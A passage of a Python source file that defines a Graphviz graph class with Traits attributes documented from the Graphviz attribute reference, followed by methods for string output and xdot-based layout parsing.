inches.\n dpi = Float(96.0, desc=\"expected number of pixels per inch on a display\",\n label=\"DPI\", graphviz=True)\n\n # Terminating condition. If the length squared of all energy gradients are\n # < <html:a rel=\"attr\">epsilon</html:a>, the algorithm stops.\n epsilon = Float(0.0001, desc=\"terminating condition\", graphviz=True)\n\n # Fraction to increase polygons (multiply\n # coordinates by 1 + esep) for purposes of spline edge routing.\n # This should normally be strictly less than\n # <html:a rel=\"attr\">sep</html:a>.\n esep = Int(3, desc=\"Fraction to increase polygons (multiply coordinates \"\n \"by 1 + esep) for purposes of spline edge routing\",\n label=\"Edge separation\", graphviz=True)\n\n # Color used for text.\n fontcolor = fontcolor_trait\n\n # Font used for text. This very much depends on the output format and, for\n # non-bitmap output such as PostScript or SVG, the availability of the font\n # when the graph is displayed or printed. As such, it is best to rely on\n # font faces that are generally available, such as Times-Roman, Helvetica or\n # Courier.\n #\n # If Graphviz was built using the\n # <html:a href=\"http://pdx.freedesktop.org/~fontconfig/fontconfig-user.html\">fontconfig library</html:a>, the latter library\n # will be used to search for the font. However, if the <html:a rel=\"attr\">fontname</html:a> string\n # contains a slash character \"/\", it is treated as a pathname for the font\n # file, though font lookup will append the usual font suffixes.\n #\n # If Graphviz does not use fontconfig, <html:a rel=\"attr\">fontname</html:a> will be\n # considered the name of a Type 1 or True Type font file.\n # If you specify <html:code>fontname=schlbk</html:code>, the tool will look for a\n # file named <html:code>schlbk.ttf</html:code> or <html:code>schlbk.pfa</html:code> or <html:code>schlbk.pfb</html:code>\n # in one of the directories specified by\n # the <html:a rel=\"attr\">fontpath</html:a> attribute.\n # The lookup does support various aliases for the common fonts.\n fontname = fontname_trait\n\n # Allows user control of how basic fontnames are represented in SVG output.\n # If <html:a rel=\"attr\">fontnames</html:a> is undefined or <html:span class=\"val\">svg</html:span>,\n # the output will try to use known SVG fontnames. For example, the\n # default font <html:code>Times-Roman</html:code> will be mapped to the\n # basic SVG font <html:code>serif</html:code>. This can be overridden by setting\n # <html:a rel=\"attr\">fontnames</html:a> to <html:span class=\"val\">ps</html:span> or <html:span class=\"val\">gd</html:span>.\n # In the former case, known PostScript font names such as\n # <html:code>Times-Roman</html:code> will be used in the output.\n # In the latter case, the fontconfig font conventions\n # are used. Thus, <html:code>Times-Roman</html:code> would be treated as\n # <html:code>Nimbus Roman No9 L</html:code>. These last two options are useful\n # with SVG viewers that support these richer fontname spaces.\n fontnames = Enum(\"svg\", \"ps\", \"gd\", label=\"Font names\",\n desc=\"how basic fontnames are represented in SVG output\",\n graphviz=True)\n\n # Directory list used by libgd to search for bitmap fonts if Graphviz\n # was not built with the fontconfig library.\n # If <html:a rel=\"attr\">fontpath</html:a> is not set, the environment\n # variable <html:code>DOTFONTPATH</html:code> is checked.\n # If that is not set, <html:code>GDFONTPATH</html:code> is checked.\n # If not set, libgd uses its compiled-in font path.\n # Note that fontpath is an attribute of the root graph.\n fontpath = List(Directory, label=\"Font path\", graphviz=True)\n\n # Font size, in <html:a rel=\"note\">points</html:a>, used for text.\n fontsize = fontsize_trait\n\n # Spring constant used in virtual physical model. It roughly corresponds to\n # an ideal edge length (in inches), in that increasing K tends to increase\n # the distance between nodes. Note that the edge attribute len can be used\n # to override this value for adjacent nodes.\n K = Float(0.3, desc=\"spring constant used in virtual physical model\",\n graphviz=True)\n\n # Text label attached to objects.\n # If a node's <html:a rel=\"attr\">shape</html:a> is record, then the label can\n # have a <html:a href=\"http://www.graphviz.org/doc/info/shapes.html#record\">special format</html:a>\n # which describes the record layout.\n label = label_trait\n\n # Justification for cluster labels. If <html:span class=\"val\">r</html:span>, the label\n # is right-justified within bounding rectangle; if <html:span class=\"val\">l</html:span>, left-justified;\n # else the label is centered.\n # Note that a subgraph inherits attributes from its parent. Thus, if\n # the root graph sets <html:a rel=\"attr\">labeljust</html:a> to <html:span class=\"val\">l</html:span>, the subgraph inherits\n # this value.\n labeljust = Trait(\"c\", {\"Centre\": \"c\", \"Right\": \"r\", \"Left\": \"l\"},\n desc=\"justification for cluster labels\", label=\"Label justification\",\n graphviz=True)\n\n # Top/bottom placement of graph and cluster labels.\n # If the attribute is <html:span class=\"val\">t</html:span>, place label at the top;\n # if the attribute is <html:span class=\"val\">b</html:span>, place label at the bottom.\n # By default, root\n # graph labels go on the bottom and cluster labels go on the top.\n # Note that a subgraph inherits attributes from its parent. Thus, if\n # the root graph sets <html:a rel=\"attr\">labelloc</html:a> to <html:span class=\"val\">b</html:span>, the subgraph inherits\n # this value.\n labelloc = Trait(\"b\", {\"Bottom\": \"b\", \"Top\":\"t\"},\n desc=\"placement of graph and cluster labels\",\n label=\"Label location\", graphviz=True)\n\n # If true, the graph is rendered in landscape mode. Synonymous with\n # <html:code><html:a rel=\"attr\">rotate</html:a>=90</html:code> or <html:code>\n # <html:a rel=\"attr\">orientation</html:a>=landscape</html:code>.\n landscape = Bool(False, desc=\"rendering in landscape mode\", graphviz=True)\n\n # Specifies a linearly ordered list of layer names attached to the graph\n # The graph is then output in separate layers. Only those components\n # belonging to the current output layer appear. For more information,\n # see the page <html:a href=\"http://www.graphviz.org/Documentation/html/layers/\">How to use drawing layers (overlays)</html:a>.\n layers = Str(desc=\"a linearly ordered list of layer names\",\n graphviz=True)\n\n # Specifies the separator characters used to split the\n # <html:a rel=\"attr\">layers </html:a>attribute into a list of layer names.\n layersep = Enum(\":\\t\", \"\\t\", \" \", label=\"Layer separation\",\n desc=\"separator characters used to split layer names\", graphviz=True)\n\n # Specifies strictness of level constraints in neato\n # when <html:code><html:a rel=\"attr\">mode</html:a>=\"ipsep\" or \"hier\"</html:code>.\n # Larger positive values mean stricter constraints, which demand more\n # separation between levels. On the other hand, negative values will relax\n # the constraints by allowing some overlap between the levels.\n levelsgap = Float(0.0, desc=\"strictness of level constraints in neato\",\n label=\"Levels gap\", graphviz=True)\n\n # Label position, in points. The position indicates the center of the\n # label.\n lp = point_trait\n\n # For graphs, this sets x and y margins of canvas, in inches. If the margin\n # is a single double, both margins are set equal to the given value.\n #\n # Note that the margin is not part of the drawing but just empty space\n # left around the drawing. It basically corresponds to a translation of\n # drawing, as would be necessary to center a drawing on a page. Nothing\n # is actually drawn in the margin. To actually extend the background of\n # a drawing, see the <html:a rel=\"attr\">pad</html:a> attribute.\n #\n # For nodes, this attribute specifies space left around the node's label.\n # By default, the value is <html:code>0.11,0.055</html:code>.\n margin = margin_trait#Either(Float, pointf_trait, desc=\"x and y margins of canvas\")\n\n # Sets the number of iterations used.\n maxiter = Int(200, desc=\"number of iterations used\",\n label=\"Maximum iterations\", graphviz=True)\n\n # Multiplicative scale factor used to alter the MinQuit (default = 8)\n # and MaxIter (default = 24) parameters used during crossing\n # minimization. These correspond to the\n # number of tries without improvement before quitting and the\n # maximum number of iterations in each pass.\n mclimit = Float(1.0, desc=\"Multiplicative scale factor used to alter the \"\n \"MinQuit (default = 8) and MaxIter (default = 24) parameters used \"\n \"during crossing minimization\", label=\"Multiplicative scale factor\",\n graphviz=True)\n\n # Specifies the minimum separation between all nodes.\n mindist = Float(1.0, desc=\"minimum separation between all nodes\",\n label=\"Minimum separation\", graphviz=True)\n\n # Technique for optimizing the layout. If <html:a rel=\"attr\">mode</html:a> is <html:span class=\"val\">major</html:span>,\n # neato uses stress majorization. If <html:a rel=\"attr\">mode</html:a> is <html:span class=\"val\">KK</html:span>,\n # neato uses a version of the gradient descent method. The only advantage\n # to the latter technique is that it is sometimes appreciably faster for\n # small (number of nodes < 100) graphs. A significant disadvantage is that\n # it may cycle.\n #\n # There are two new, experimental modes in neato, <html:span class=\"val\">hier</html:span>, which adds a top-down\n # directionality similar to the layout used in dot, and <html:span class=\"val\">ipsep</html:span>, which\n # allows the graph to specify minimum vertical and horizontal distances\n # between nodes. (See the <html:a rel=\"attr\">sep</html:a> attribute.)\n mode = Enum(\"major\", \"KK\", \"heir\", \"ipsep\",\n desc=\"Technique for optimizing the layout\", graphviz=True)\n\n # This value specifies how the distance matrix is computed for the input\n # graph. The distance matrix specifies the ideal distance between every\n # pair of nodes. neato attemps to find a layout which best achieves\n # these distances. By default, it uses the length of the shortest path,\n # where the length of each edge is given by its <html:a rel=\"attr\">len</html:a>\n # attribute. If <html:a rel=\"attr\">model</html:a> is <html:span class=\"val\">circuit</html:span>, neato uses the\n # circuit resistance\n # model to compute the distances. This tends to emphasize clusters. If\n # <html:a rel=\"attr\">model</html:a> is <html:span class=\"val\">subset</html:span>, neato uses the subset model. This sets the\n # edge length to be the number of nodes that are neighbors of exactly one\n # of the end points, and then calculates the shortest paths. This helps\n # to separate nodes with high degree.\n model = Enum(\"shortpath\", \"circuit\", \"subset\",\n desc=\"how the distance matrix is computed for the input graph\",\n graphviz=True)\n\n # If Graphviz is built with MOSEK defined, mode=ipsep and mosek=true,\n # the Mosek software (www.mosek.com) is use to solve the ipsep constraints.\n mosek = Bool(False, desc=\"solve the ipsep constraints with MOSEK\",\n graphviz=True)\n\n # Minimum space between two adjacent nodes in the same rank, in inches.\n nodesep = Float(0.25, desc=\"minimum space between two adjacent nodes in \"\n \"the same rank\", label=\"Node separation\", graphviz=True)\n\n # By default, the justification of multi-line labels is done within the\n # largest context that makes sense. Thus, in the label of a polygonal node,\n # a left-justified line will align with the left side of the node (shifted\n # by the prescribed margin). In record nodes, left-justified line will line\n # up with the left side of the enclosing column of fields. If nojustify is\n # \"true\", multi-line labels will be justified in the context of itself. For\n # example, if the attribute is set, the first label line is long, and the\n # second is shorter and left-justified, the second will align with the\n # left-most character in the first line, regardless of how large the node\n # might be.\n nojustify = nojustify_trait\n\n # If set, normalize coordinates of final\n # layout so that the first point is at the origin, and then rotate the\n # layout so that the first edge is horizontal.\n normalize = Bool(False, desc=\"If set, normalize coordinates of final \"\n \"layout so that the first point is at the origin, and then rotate the \"\n \"layout so that the first edge is horizontal\", graphviz=True)\n\n # Used to set number of iterations in\n # network simplex applications, used in\n # computing node x coordinates.\n # If defined, # iterations = <html:a rel=\"attr\">nslimit</html:a> * # nodes;\n # otherwise, # iterations = MAXINT.\n nslimit = Float(desc=\"iterations in network simplex applications\",\n label=\"x-coordinate limit\", graphviz=True)\n\n # Used to set number of iterations in\n # network simplex applications, used for ranking nodes.\n # If defined, # iterations = <html:a rel=\"attr\">nslimit1</html:a> * # nodes;\n # otherwise, # iterations = MAXINT.\n nslimit1 = Float(desc=\"iterations in network simplex applications\",\n label=\"Ranking limit\", graphviz=True)\n\n # If \"out\" for a graph G, and n is a node in G, then edges n->* appear\n # left-to-right in the same order in which they are defined.\n # If \"in\", the edges *->n appear\n # left-to-right in the same order in which they are defined for all\n # nodes n.\n ordering = Enum(\"out\", \"in\", desc=\"If 'out' for a graph G, and n is a \"\n \"node in G, then edges n->* appear left-to-right in the same order in \"\n \"which they are defined. If 'in', the edges *->n appear left-to-right \"\n \"in the same order in which they are defined for all nodes n.\",\n graphviz=True)\n\n # These specify the order in which nodes and edges are drawn in concrete\n # output. The default \"breadthfirst\" is the simplest, but when the graph\n # layout does not avoid edge-node overlap, this mode will sometimes have\n # edges drawn over nodes and sometimes on top of nodes. If the mode\n # \"nodesfirst\" is chosen, all nodes are drawn first, followed by the\n # edges. This guarantees an edge-node overlap will not be mistaken for\n # an edge ending at a node. On the other hand, usually for aesthetic\n # reasons, it may be desirable that all edges appear beneath nodes,\n # even if the resulting drawing is ambiguous. This can be achieved by\n # choosing \"edgesfirst\".\n outputorder = Enum(\"breadthfirst\", \"nodesfirst\", \"edgesfirst\",\n desc=\"order in which nodes and edges are drawn\", label=\"Output order\",\n graphviz=True)\n\n # Determines if and how node overlaps should be removed. Nodes are first\n # enlarged using the <html:a rel=\"attr\">sep</html:a> attribute.\n # If <html:span class=\"val\">true</html:span>, overlaps are retained.\n # If the value is <html:span class=\"val\">scale</html:span>, overlaps are removed by uniformly scaling in x and y.\n # If the value converts to <html:span class=\"val\">false</html:span>, node overlaps are removed by a\n # Voronoi-based technique.\n # If the value is <html:span class=\"val\">scalexy</html:span>, x and y are separately\n # scaled to remove overlaps.\n # If the value is <html:span class=\"val\">orthoxy</html:span> or <html:span class=\"val\">orthoyx</html:span>, overlaps\n # are moved by optimizing two constraint problems, one for the x axis and\n # one for the y. The suffix indicates which axis is processed first.\n # If the value is <html:span class=\"val\">ortho</html:span>, the technique is similar to <html:span class=\"val\">orthoxy</html:span> except a\n # heuristic is used to reduce the bias between the two passes.\n # If the value is <html:span class=\"val\">ortho_yx</html:span>, the technique is the same as <html:span class=\"val\">ortho</html:span>, except\n # the roles of x and y are reversed.\n # The values <html:span class=\"val\">portho</html:span>, <html:span class=\"val\">porthoxy</html:span>, <html:span class=\"val\">porthoxy</html:span>, and <html:span class=\"val\">portho_yx</html:span> are similar\n # to the previous four, except only pseudo-orthogonal ordering is\n # enforced.\n #\n # If the value is <html:span class=\"val\">compress</html:span>, the layout will be scaled down as much as\n # possible without introducing any overlaps, obviously assuming there are\n # none to begin with.\n #\n # If the value is <html:span class=\"val\">ipsep</html:span>, and the layout is done by neato with\n # <html:a rel=\"attr\">mode</html:a>=\"ipsep\", the overlap removal constraints are\n # incorporated into the layout algorithm itself.\n # N.B. At present, this only supports one level of clustering.\n #\n # If the value is <html:span class=\"val\">vpsc</html:span>, overlap removal is similarly to <html:span class=\"val\">ortho</html:span>, except\n # quadratic optimization is used to minimize node displacement.\n # N.B. At present, this mode only works when <html:a rel=\"attr\">mode</html:a>=\"ipsep\".\n #\n # Except for fdp, the layouts assume <html:code>overlap=\"true\"</html:code> as the default.\n # Fdp first uses a number of passes using built-in, force-directed technique\n # to remove overlaps. Thus, fdp accepts <html:a rel=\"attr\">overlap</html:a> with an integer\n # prefix followed by a colon, specifying the number of tries. If there is\n # no prefix, no initial tries will be performed. If there is nothing following\n # a colon, none of the above methods will be attempted. By default, fdp\n # uses <html:code>overlap=\"9:portho\"</html:code>. Note that <html:code>overlap=\"true\"</html:code>,\n # <html:code>overlap=\"0:true\"</html:code> and <html:code>overlap=\"0:\"</html:code> all turn off all overlap\n # removal.\n #\n # Except for the Voronoi method, all of these transforms preserve the\n # orthogonal ordering of the original layout. That is, if the x coordinates\n # of two nodes are originally the same, they will remain the same, and if\n # the x coordinate of one node is originally less than the x coordinate of\n # another, this relation will still hold in the transformed layout. The\n # similar properties hold for the y coordinates.\n # This is not quite true for the \"porth*\" cases. For these, orthogonal\n # ordering is only preserved among nodes related by an edge.\n #\n # <html:b>NOTE</html:b>The methods <html:span class=\"val\">orthoxy</html:span> and <html:span class=\"val\">orthoyx</html:span> are still evolving. The semantics of these may change, or these methods may disappear altogether.\n overlap = Enum(\"True\", \"False\", \"scale\", \"scalexy\", \"prism\", \"compress\",\n \"vpsc\", \"ipsep\", desc=\"determines if and how node overlaps should be \"\n \"removed\", graphviz=True)\n\n # This is true if the value of pack is \"true\" or a non-negative integer.\n # If true, each connected component of the graph is laid out separately,\n # and then the graphs are packed tightly. If pack has an integral value,\n # this is used as the size, in points, of a margin around each part;\n # otherwise, a default margin of 8 is used. If pack is interpreted as\n # false, the entire graph is laid out together. The granularity and method\n # of packing is influenced by the packmode attribute.\n #\n # For layouts which always do packing, such a twopi, the pack attribute is\n # just used to set the margin.\n pack = Bool(graphviz=True) #Either(\n# Bool, Int, desc=\"If true, each connected component of the graph is \"\n# \"laid out separately, and then the graphs are packed tightly\"\n# )\n\n # This indicates the granularity and method used for packing\n # (cf. <html:a rel=\"type\">packMode</html:a>). Note that defining\n # <html:a rel=\"attr\">packmode</html:a> will automatically turn on packing as though one had\n # set <html:code>pack=true</html:code>.\n #\n # \"node\",\"clust\",\"graph\" These specify the granularity of packing connected\n # components when the pack attribute is true. A value of \"node\" causes\n # packing at the node and edge label, with no overlapping of these objects.\n # This produces a layout with the least area, but it also allows\n # interleaving, where a node of one component may lie between two nodes in\n # another component. A value of \"graph\" does a packing using the bounding\n # box of the component. Thus, there will be a rectangular region around a\n # component free of elements of any other component. A value of \"clust\"\n # guarantees that top-level clusters are kept intact. What effect a value\n # has also depends on the layout algorithm. For example, neato does not\n # support clusters, so a value of \"clust\" will have the same effect as the\n # default \"node\" value.\n packmode = Enum(\"node\", \"cluster\", \"graph\", label=\"Pack mode\",\n desc=\"granularity and method used for packing\", graphviz=True)\n\n # The pad attribute specifies how much, in inches, to extend the\n # drawing area around the minimal area needed to draw the graph.\n # If the pad is a single double, both the x and y pad values are set\n # equal to the given value. This area is part of the\n # drawing and will be filled with the background color, if appropriate.\n #\n # Normally, a small pad is used for aesthetic reasons, especially when\n # a background color is used, to avoid having nodes and edges abutting\n # the boundary of the drawn region.\n pad = Float(0.0555, desc=\"how much to extend the drawing area around the \"\n \"minimal area needed to draw the graph\", graphviz=True)\n\n # Width and height of output pages, in inches. If this is set and is\n # smaller than the size of the layout, a rectangular array of pages of the\n # specified page size is overlaid on the layout, with origins aligned in\n # the lower-left corner, thereby partitioning the layout into pages. The\n # pages are then produced one at a time, in pagedir order.\n #\n # At present, this only works for PostScript output. For other types of\n # output, one should use another tool to split the output into multiple\n # output files. Or use the viewport to generate multiple files.\n page = pointf_trait\n\n # If the <html:a rel=\"attr\">page</html:a> attribute is set and applicable,\n # this attribute specifies the order in which the pages are emitted.\n # This is limited to one of the 8 row or column major orders.\n pagedir = Enum(\"BL\", \"BR\", \"TL\", \"TR\", \"RB\", \"RT\", \"LB\", \"LT\",\n desc=\"If the page attribute is set and applicable, this attribute \"\n \"specifies the order in which the pages are emitted\",\n label=\"Page direction\", graphviz=True)\n\n # If <html:a rel=\"attr\">quantum</html:a> > 0.0, node label dimensions\n # will be rounded to integral multiples of the quantum.\n quantum = Float(0.0, desc=\"If quantum > 0.0, node label dimensions will \"\n \"be rounded to integral multiples of the quantum.\", graphviz=True)\n\n # Sets direction of graph layout. For example, if <html:a rel=\"attr\">rankdir</html:a>=\"LR\",\n # and barring cycles, an edge <html:code>T -> H;</html:code> will go\n # from left to right. By default, graphs are laid out from top to bottom.\n rankdir = Enum(\"TB\", \"LR\", \"BT\", \"RL\", desc=\"direction of graph layout\",\n label=\"Rank direction\", graphviz=True)\n\n # In dot, this gives the desired rank separation, in inches. This is\n # the minimum vertical distance between the bottom of the nodes in one\n # rank and the tops of nodes in the next. If the value\n # contains \"equally\", the centers of all ranks are spaced equally apart.\n # Note that both\n # settings are possible, e.g., ranksep = \"1.2 equally\".\n # In twopi, specifies radial separation of concentric circles.\n ranksep = Float(0.5, desc=\"In dot, this gives the desired rank \"\n \"separation. In twopi, specifies radial separation of concentric \"\n \"circles\", label=\"Rank separation\", graphviz=True)\n\n # Sets the aspect ratio (drawing height/drawing width) for the drawing.\n # Note that this is adjusted before the size attribute constraints are\n # enforced.\n #\n # If ratio is numeric, it is taken as the desired aspect ratio. Then, if\n # the actual aspect ratio is less than the desired ratio, the drawing\n # height is scaled up to achieve the desired ratio; if the actual ratio is\n # greater than that desired ratio, the drawing width is scaled up.\n #\n # If ratio = \"fill\" and the size attribute is set, node positions are\n # scaled, separately in both x and y, so that the final drawing exactly\n # fills the specified size.\n #\n # If ratio = \"compress\" and the size attribute is set, dot attempts to\n # compress the initial layout to fit in the given size. This achieves a\n # tighter packing of nodes but reduces the balance and symmetry. This\n # feature only works in dot.\n #\n # If ratio = \"expand\", the size attribute is set, and both the width and\n # the height of the graph are less than the value in size, node positions\n # are scaled uniformly until at least one dimension fits size exactly.\n # Note that this is distinct from using size as the desired size, as here\n # the drawing is expanded before edges are generated and all node and text\n # sizes remain unchanged.\n #\n # If ratio = \"auto\", the page attribute is set and the graph cannot be\n # drawn on a single page, then size is set to an ``ideal'' value. In\n # particular, the size in a given dimension will be the smallest integral\n # multiple of the page size in that dimension which is at least half the\n # current size. The two dimensions are then scaled independently to the new\n # size. This feature only works in dot.\n# ratio = Either(Float, Enum(\"fill\", \"compress\", \"expand\", \"auto\"),\n ratio = Enum(\"fill\", \"compress\", \"expand\", \"auto\",\n desc=\"aspect ratio (drawing height/drawing width) for the drawing\",\n graphviz=True)\n\n # If true and there are multiple clusters, run cross minimization a second\n # time.\n remincross = Bool(False, desc=\"If true and there are multiple clusters, \"\n \"run cross minimization a second\", label=\"Re-cross minimization\",\n graphviz=True)\n\n # This is a synonym for the <html:a rel=\"attr\">dpi</html:a> attribute.\n resolution = Alias(\"dpi\", desc=\"a synonym for the dpi attribute\",\n graphviz=True)\n\n # This specifies nodes to be used as the center of the\n # layout and the root of the generated spanning tree. As a graph attribute,\n # this gives the name of the node. As a node attribute (circo only), it\n # specifies that the node should be used as a central node. In twopi,\n # this will actually be the central node. In circo, the block containing\n # the node will be central in the drawing of its connected component.\n # If not defined,\n # twopi will pick a most central node, and circo will pick a random node.\n root = root_trait\n\n # If 90, set drawing orientation to landscape.\n rotate = Range(0, 360, desc=\"drawing orientation\", graphviz=True)\n\n # During network simplex, maximum number of edges with negative cut values\n # to search when looking for one with minimum cut value.\n searchsize = Int(30, desc=\"maximum number of edges with negative cut \"\n \"values to search when looking for one with minimum cut value\",\n label=\"Search size\", graphviz=True)\n\n # Fraction to increase polygons (multiply\n # coordinates by 1 + sep) for purposes of determining overlap. Guarantees\n # a minimal non-zero distance between nodes.\n # If unset but <html:a rel=\"attr\">esep</html:a> is defined, <html:a rel=\"attr\">sep</html:a> will be\n # set to <html:code>esep/0.8</html:code>. If <html:a rel=\"attr\">esep</html:a> is unset, the default value\n # is used.\n #\n # When <html:a rel=\"attr\">overlap</html:a>=\"ipsep\" or \"vpsc\",\n # <html:a rel=\"attr\">sep</html:a> gives a minimum distance, in inches, to be left between nodes.\n # In this case, if <html:a rel=\"attr\">sep</html:a> is a pointf, the x and y separations can be\n # specified separately.\n sep = Int(4, desc=\"Fraction to increase polygons (multiply coordinates by \"\n \"1 + sep) for purposes of determining overlap\", label=\"Separation\",\n graphviz=True)\n\n # Print guide boxes in PostScript at the beginning of\n # routesplines if 1, or at the end if 2. (Debugging)\n showboxes = showboxes_trait\n\n # Maximum width and height of drawing, in inches.\n # If defined and the drawing is too large, the drawing is uniformly\n # scaled down so that it fits within the given size.\n #\n # If <html:a rel=\"attr\">size</html:a> ends in an exclamation point (<html:tt>!</html:tt>),\n # then it is taken to be\n # the desired size. In this case, if both dimensions of the drawing are\n # less than <html:a rel=\"attr\">size</html:a>, the drawing is scaled up uniformly until at\n # least one dimension equals its dimension in <html:a rel=\"attr\">size</html:a>.\n #\n # Note that there is some interaction between the <html:a rel=\"attr\">size</html:a> and\n # <html:a rel=\"attr\">ratio</html:a> attributes.\n size = pointf_trait\n\n # Controls how, and if, edges are represented. If true, edges are drawn as\n # splines routed around nodes; if false, edges are drawn as line segments.\n # If set to \"\", no edges are drawn at all.\n #\n # (1 March 2007) The values <html:span class=\"val\">line</html:span> and <html:span class=\"val\">spline</html:span> can be\n # used as synonyms for <html:span class=\"val\">false</html:span> and <html:span class=\"val\">true</html:span>, respectively.\n # In addition, the value <html:span class=\"val\">polyline</html:span> specifies that edges should be\n # drawn as polylines.\n #\n # By default, the attribute is unset. How this is interpreted depends on\n # the layout. For dot, the default is to draw edges as splines. For all\n # other layouts, the default is to draw edges as line segments. Note that\n # for these latter layouts, if <html:code>splines=\"true\"</html:code>, this\n # requires non-overlapping nodes (cf. <html:a rel=\"attr\">overlap</html:a>).\n # If fdp is used for layout and <html:tt>splines=\"compound\"</html:tt>, then the edges are\n # drawn to avoid clusters as well as nodes.\n splines = Enum(\"True\", \"False\", \"\",\n desc=\"how, and if, edges are represented\", graphviz=True)\n\n # Parameter used to determine the initial layout of nodes. If unset, the\n # nodes are randomly placed in a unit square with\n # the same seed is always used for the random number generator, so the\n # initial placement is repeatable.\n #\n #\n # has the syntax [style][seed].\n #\n # If style is present, it must be one of the strings \"regular\", \"self\", or\n # \"random\". In the first case, the nodes are placed regularly about a\n # circle. In the second case, an abbreviated version of neato is run to\n # obtain the initial layout. In the last case, the nodes are placed\n # randomly in a unit square.\n #\n # If seed is present, it specifies a seed for the random number generator.\n # If seed is a positive number, this is used as the seed. If it is anything\n # else, the current time, and possibly the process id, is used to pick a\n # seed, thereby making the choice more random. In this case, the seed value\n # is stored in the graph.\n #\n # If the value is just \"random\", a time-based seed is chosen.\n #\n # Note that input positions, specified by a node's pos attribute, are only\n # used when the style is \"random\".\n start = start_trait\n\n # A URL or pathname specifying an XML style sheet, used in SVG output.\n stylesheet = Str(desc=\"URL or pathname specifying an XML style sheet\",\n label=\"Style sheet\", graphviz=True)\n\n # If the object has a URL, this attribute determines which window\n # of the browser is used for the URL.\n # See <html:a href=\"http://www.w3.org/TR/html401/present/frames.html#adef-target\">W3C documentation</html:a>.\n target = target_trait\n\n # If set explicitly to true or false, the value determines whether or not\n # internal bitmap rendering relies on a truecolor color model or uses\n # a color palette.\n # If the attribute is unset, truecolor is not used\n # unless there is a <html:a rel=\"attr\">shapefile</html:a> property\n # for some node in the graph.\n # The output model will use the input model when possible.\n #\n # Use of color palettes results in less memory usage during creation of the\n # bitmaps and smaller output files.\n #\n # Usually, the only time it is necessary to specify the truetype model\n # is if the graph uses more than 256 colors.\n # However, if one uses <html:a rel=\"attr\">bgcolor</html:a>=transparent with\n # a color palette, font\n # antialiasing can show up as a fuzzy white area around characters.\n # Using <html:a rel=\"attr\">truecolor</html:a>=true avoids this problem.\n truecolor = Bool(True, desc=\"bitmap rendering relies on a truecolor color \"\n \"model or uses a color palette\", graphviz=True)\n\n # Hyperlinks incorporated into device-dependent output.\n # At present, used in ps2, cmap, i*map and svg formats.\n # For all these formats, URLs can be attached to nodes, edges and\n # clusters. URL attributes can also be attached to the root graph in ps2,\n # cmap and i*map formats. This serves as the base URL for relative URLs in the\n # former, and as the default image map file in the latter.\n #\n # For svg, cmapx and imap output, the active area for a node is its\n # visible image.\n # For example, an unfilled node with no drawn boundary will only be active on its label.\n # For other output, the active area is its bounding box.\n # The active area for a cluster is its bounding box.\n # For edges, the active areas are small circles where the edge contacts its head\n # and tail nodes. In addition, for svg, cmapx and imap, the active area\n # includes a thin polygon approximating the edge. The circles may\n # overlap the related node, and the edge URL dominates.\n # If the edge has a label, this will also be active.\n # Finally, if the edge has a head or tail label, this will also be active.\n #\n # Note that, for edges, the attributes <html:a rel=\"attr\">headURL</html:a>,\n # <html:a rel=\"attr\">tailURL</html:a>, <html:a rel=\"attr\">labelURL</html:a> and\n # <html:a rel=\"attr\">edgeURL</html:a> allow control of various parts of an\n # edge. Also note that, if active areas of two edges overlap, it is unspecified\n # which area dominates.\n URL = Str(desc=\"hyperlinks incorporated into device-dependent output\",\n label=\"URL\", graphviz=True)\n\n # Clipping window on final drawing.\n #\n # \"%lf,%lf,%lf,%lf,%lf\" or \"%lf,%lf,%lf,\"%s\"\"\n #\n # The viewPort W,H,Z,x,y or W,H,Z,N specifies a viewport for the final\n # image. The pair (W,H) gives the dimensions (width and height) of the\n # final image, in points. The optional Z is the zoom factor, i.e., the\n # image in the original layout will be W/Z by H/Z points in size. By\n # default, Z is 1. The optional last part is either a pair (x,y) giving a\n # position in the original layout of the graph, in points, of the center of\n # the viewport, or the name N of a node whose center should used as the\n # focus. By default, the focus is the center of the graph bounding box,\n # i.e., (bbx/2,bby/2), where \"bbx,bby\" is the value of the bounding box\n # attribute bb.\n #\n # Sample values: 50,50,.5,'2.8 BSD' or 100,100,2,450,300. The first will\n # take the 100x100 point square centered on the node 2.8 BSD and scale it\n # down by 0.5, yielding a 50x50 point final image.\n viewport = Tuple(Float, Float, Float, Float, Float, graphviz=True)\n# Either(\n# Tuple(Float, Float, Float, Float, Float),\n# Tuple(Float, Float, Float, Str),\n# desc=\"clipping window on final drawing\"\n# )\n\n voro_margin = Float(0.05, desc=\"Factor to scale up drawing to allow \"\n \"margin for expansion in Voronoi technique. dim' = (1+2*margin)*dim.\",\n label=\"Voronoi margin\", graphviz=True)\n\n\n# def _defaultdist_default(self):\n# \"\"\" Trait initialiser \"\"\"\n#\n# return 1+(avg. len)*math.sqrt(|V|)\n\n #--------------------------------------------------------------------------\n # Views:\n #--------------------------------------------------------------------------\n\n traits_view = tabbed_view\n# traits_view = graph_view\n\n #--------------------------------------------------------------------------\n # \"object\" interface:\n #--------------------------------------------------------------------------\n\n def __init__(self, *args, **kw_args):\n \"\"\" Initialises the graph.\n \"\"\"\n super(Graph, self).__init__(*args, **kw_args)\n\n # Listen for the addition or removal of nodes and update each branch's\n # list of available nodes so that they can move themselves.\n self.on_trait_change(self._on_nodes, \"subgraphs*.nodes\")\n self.on_trait_change(self._on_nodes, \"subgraphs*.nodes_items\")\n\n # Listen for the addition of edges and check that the heado_node and\n # tail_node instances exist in the graph or any subgraphs.\n self.on_trait_change(self._on_edges, \"subgraphs*.edges\")\n self.on_trait_change(self._on_edges, \"subgraphs*.edges_items\")\n\n\n def __str__(self):\n \"\"\" Returns a string representation of the graph in dot language. It\n will return the graph and all its subelements in string form.\n \"\"\"\n s = \"\"\n if self.strict:\n s += \"strict \"\n\n if self.directed:\n s += \"digraph\"\n else:\n s += \"graph\"\n\n return \"%s %s\" % ( s, super(Graph, self).__str__() )\n\n #--------------------------------------------------------------------------\n # Public interface:\n #--------------------------------------------------------------------------\n\n @on_trait_change(\"arrange\")\n def arrange_all(self):\n \"\"\" Sets for the _draw_ and _ldraw_ attributes for each of the graph\n sub-elements by processing the xdot format of the graph.\n \"\"\"\n import godot.dot_data_parser\n\n parser = godot.dot_data_parser.GodotDataParser()\n\n xdot_data = self.create( format = \"xdot\" )\n# print \"GRAPH DOT:\\n\", str( self )\n# print \"XDOT DATA:\\n\", xdot_data\n\n parser.dotparser.parseWithTabs()\n ndata = xdot_data.replace( \"\\\\\\n\", \"\" )\n tokens = parser.dotparser.parseString( ndata )[0]\n parser.build_graph( graph=self, tokens=tokens[3] )\n\n self.redraw_canvas()\n\n\n @on_trait_change(\"redraw\")\n def redraw_canvas(self):\n 